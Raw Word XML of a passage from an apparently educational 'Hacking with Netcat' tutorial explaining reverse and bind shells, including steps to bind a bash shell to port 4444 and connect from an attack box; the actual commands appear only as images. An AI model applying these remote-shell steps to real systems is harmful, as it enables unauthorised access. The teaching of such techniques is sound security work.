        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="316DAE88" wp14:editId="57CD687A">
            <wp:extent cx="7105650" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="Picture 37" descr="Python reverse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ython reverse shel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105650" cy="3524250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F465BED" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="450"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>An example of a Python reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39416419" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Netcat Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA9D41F"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As we’ve mentioned earlier in this Hacking with Netcat tutorial a bind shell is a shell that binds to a specific port on the target host to listen for incoming connections. Let’s have a look at the visualization of a bind Netcat shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B7637" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E2DFEB0" wp14:editId="45909522">
            <wp:extent cx="7988300" cy="3365500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="38" name="Picture 38" descr="Netcat bin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etcat bind shel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988300" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1632E45D" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="450"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Netcat Bind Shell explained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396F8918"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In this visualization the target binds a Bash shell to port 4444 using a Netcat listener. The attacker connects to this port using a simple Netcat command. The steps to setup a bind shell are as following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EB383C" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="630"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Bind a bash shell to port 4444 using Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D91976" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="630"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Connect to the target host on port 4444 from the attack box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB2782C" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="630"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Issue commands on the target host from the attack box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8DB38" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="E54E53"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56B6021B" wp14:editId="1F7BADF6">
            <wp:extent cx="9753600" cy="4876800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="Picture 39" descr="Virtual Hacking Labs - Penetration testing lab">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId74" tgtFrame="&quot;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irtual Hacking Labs - Penetration testing lab">
                      <a:hlinkClick r:id="rId74" tgtFrame="&quot;new&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753600" cy="4876800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BEC5C4" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Netcat Bind shell example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5C28D"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Let’s see how this looks on the console:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF5669A" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66CD7C46" wp14:editId="74257553">
            <wp:extent cx="7099300" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="40" name="Picture 40" descr="Netcat Bind shel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etcat Bind shell examp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099300" cy="2857500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="536DF172" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="450"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Netcat Bind Shell example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD4718A"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The target host binds a Bash shell to port 4444, than the attack connects to that port using Netcat and gains a root shell on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60148DC7" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Lessons learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8FF28C"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In part 2 of the Hacking with Netcat series we have learned that reverse shell connect back from a target host to the attack box. We have learned that we do not necessarily need Netcat to initiate the reverse shell, we can also use PHP, Python, Perl, Bash and many more alternatives. We’ve tried reverse shells with the most common programming and scripting languages. We also learned about bind shells. Bind shells bind a service to a specific port on the target host listening for an incoming connection from the attack box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2058A3E0" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="446" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>In part 3 of Hacking with Netcat we will be looking at some more advanced techniques like redirecting traffic, piping Netcat and setting up Netcat as a proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6504785E" w14:textId="77777777" w:rsidR="00835152" w:rsidRDefault="00835152"/>
    <w:p w14:paraId="7BF26BA4" w14:textId="77777777" w:rsidR="00835152" w:rsidRDefault="00835152"/>
    <w:sectPr w:rsidR="0083515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C3F11"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5ADA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D5B3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B914B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324C2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18D88A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506D25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2BE6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935E5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA308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CB37F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36B087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CA5122"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9536D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6"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>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B20"/>
    <w:rsid w:val="00195AE6"/>
    <w:rsid w:val="00835152"/>
    <w:rsid w:val="00A06BD3"/>
    <w:rsid w:val="00D51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223F0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DD14A600-8E7A-46FE-BDD2-0098C88B6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473965">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="397558675">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="315"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="533928561">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="446"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="22" w:color="auto"/>
            <w:left w:val="single" w:sz="18" w:space="22" w:color="D9D9D9"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="22" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1819612868">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="446"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="22" w:color="auto"/>
            <w:left w:val="single" w:sz="18" w:space="22" w:color="D9D9D9"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="22" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2011132528">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="446"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="22" w:color="auto"/>
            <w:left w:val="single" w:sz="18" w:space="22" w:color="D9D9D9"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="22" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1650986267">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="315"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1537548303">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="446"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="22" w:color="auto"/>
            <w:left w:val="single" w:sz="18" w:space="22" w:color="D9D9D9"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="22" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1980760739">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="315"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="538399542">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="446"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="22" w:color="auto"/>
            <w:left w:val="single" w:sz="18" w:space="22" w:color="D9D9D9"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="22" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1919435371">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="315"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="809906379">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="446"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="22" w:color="auto"/>
            <w:left w:val="single" w:sz="18" w:space="22" w:color="D9D9D9"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="22" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2040087608">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="315"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="636032935">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="446"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="22" w:color="auto"/>
            <w:left w:val="single" w:sz="18" w:space="22" w:color="D9D9D9"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="22" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1941788666">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="315"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="971248262">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="315"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1387412344">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="315"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="249512531">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1377004699">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="683242379">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1845971739">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2073579891">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
